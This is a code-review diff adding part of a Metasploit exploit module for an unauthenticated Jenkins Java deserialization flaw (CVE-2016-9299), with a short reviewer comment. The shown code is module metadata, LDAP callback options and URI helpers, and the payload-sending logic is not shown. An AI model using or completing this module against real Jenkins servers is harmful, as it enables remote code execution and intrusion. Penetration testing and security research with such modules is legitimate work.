modules/exploits/linux/misc/jenkins_ldap_deserialize.rb

```diff
@@ -0,0 +1,250 @@
+
+  SEARCH_RES_ENTRY = 4
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Jenkins CLI HTTP Java Deserialization Vulnerability',
+      'Description'    => %q{
+        This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on
+        the Jenkins, which allows remote arbitrary code execution via HTTP. Authentication is not
+        required to exploit this vulnerability.
+
+      },
+      'Author'         =>
+        [
+          'Matthias Kaiser', # Original Vulnerability discovery
+          'Alisa Esage', # Private Exploit
+          'Ivan', # Metasploit Module Author
+          'YSOSerial' #Stage 2 payload
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['linux', 'unix'],
+      'Arch'           => ARCH_CMD,
+      'Targets' => [ [ 'Jenkins 2.31', {} ] ],
+      'References'     =>
+        [
+          ['CVE', '2016-9299'],
+          ['URL', 'https://github.com/jenkinsci-cert/SECURITY-218'],
+          ['URL', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2016-11-16'],
+          ['URL', 'http://www.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class-deepsec-edition'],
+          ['URL', 'https://github.com/frohoff/ysoserial']
+        ],
+      'Payload'        =>
+        {
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd'
+            }
+        },
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Nov 16 2016'
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The base path to Jenkins', '/']),
+      Opt::RPORT('8080'),
+      OptAddress.new('SRVHOST', [ true, "The local host to listen on for the ldap server. This must be an address on the local machine or 0.0.0.0", '127.0.0.1' ]),
+      OptPort.new('SRVPORT',    [ true, "The local port to listen on for the ldap server.", 1389 ]),
+      OptAddress.new('LDAPHOST', [ true, "The ldap host the exploit will try to connect to ", '127.0.0.1' ])
+    ], self.class)
+  end
+
+  def target_uri
+    begin
+      # In case TARGETURI is empty, at least we default to '/'
+      u = datastore['TARGETURI']
+      u = "/" if u.nil? or u.empty?
+      URI(u)
+    rescue ::URI::InvalidURIError
+      print_error "Invalid URI: #{datastore['TARGETURI'].inspect}"
+      raise Msf::OptionValidateError.new(['TARGETURI'])
+    end
+  end
+
+  def normalize_uri(*strs)
+    new_str = strs * "/"
+
+    new_str = new_str.gsub!("//", "/") while new_str.index("//")
+
+    # Makes sure there's a starting slash
+    unless new_str[0,1] == '/'
+      new_str = '/' + new_str
+    end
+
+    new_str
+  end
```

Comment:
I completley agree, that said it was looking less like hep and more like lecture, maybe i just need more coffee